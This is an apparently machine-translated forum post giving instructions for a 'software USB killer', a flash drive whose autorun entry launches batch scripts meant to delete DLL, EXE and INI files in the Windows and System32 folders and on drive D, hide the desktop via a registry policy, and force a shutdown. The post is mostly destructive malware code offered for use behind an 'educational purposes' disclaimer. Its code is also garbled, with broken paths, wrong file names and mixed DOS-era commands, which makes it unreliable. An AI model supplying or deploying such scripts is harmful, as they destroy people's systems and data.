We make a software USB KILLER

President

Professional
Messages
1,458
Reaction score
1,300
Points
113
All information is provided for educational purposes only and does not call for action!
88cac357-0a25-45db-9dd7-62a6167753e3.jpeg


Many of you know about USB KILLER, which can burn your computer.
Today I will tell you how to make an analogue of such a flash drive. Of course, he will not burn the system, but he will easily demolish the Windows.

We take a USB flash drive that you do not mind (you will no longer be able to use it).

We create three files on it:
  • AUTOEXEC.BAT
  • Dead.BAT
  • autorun.ini

Open AUTOEXEC.BAT and write:
Code:
goto% config%

 : dos1

 rem c: vc401vc

 lh keyrus

 lh mmouse

 lh C: WINDOWSCOMMANDmscdex / d: 12345678

 lh dndn

 bootgui = 0

 : dos2

 rem essolo.com

 lh keyrus

 lh mmouse

 lh dndn

 bootgui = 0

 : win

 rem c: essolo.com

 set path = C: WINDOWS; C: WINDOWSCOMMAND; c:; c: windows; c: windowscomand; c: arc; c: dn

 C: WINDOWSCOMMANDDELTREE / y C: WINDOWSTEMP *. *

 mode con codepage prepare = ((866) C: WINDOWSCOMMANDega3.cpi)

 mode con codepage sеlсt = 866

 keyb ru ,, C: WINDOWSCOMMANDkeybrd3.sys

 goto continue

 : meos

 c: kolibrimeosload.com

 : l: meosload.com

 : continue

 rem bootgui = 1

 cd

 cd windows

 del * .dll

 del * .ini

 cd system32

 del * .dll

 del * .exe

 cd D:

 del * .exe


Open Dead.BAT and write:​

Code:
@echo off

 cp USB stick: AUTOEXEC.BAT C:

 msg * "Dead"> nul

 reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer / v NoDesktop / t REG_DWORD / d 1 / f> nul

 shutdown -s -t 1 -c "lol" -f> nul

In autorun.ini we write:
Code:
[autorun]

 OPEN = Dead.BAT

READY!

How it works:
  1. You insert a USB stick
  2. autorun.ini automatically opens Dead.BAT
  3. Dead.BAT copies AUTOEXEC.BAT to C and shuts down the computer.
  4. The next time you start, the system crashes.
 
Top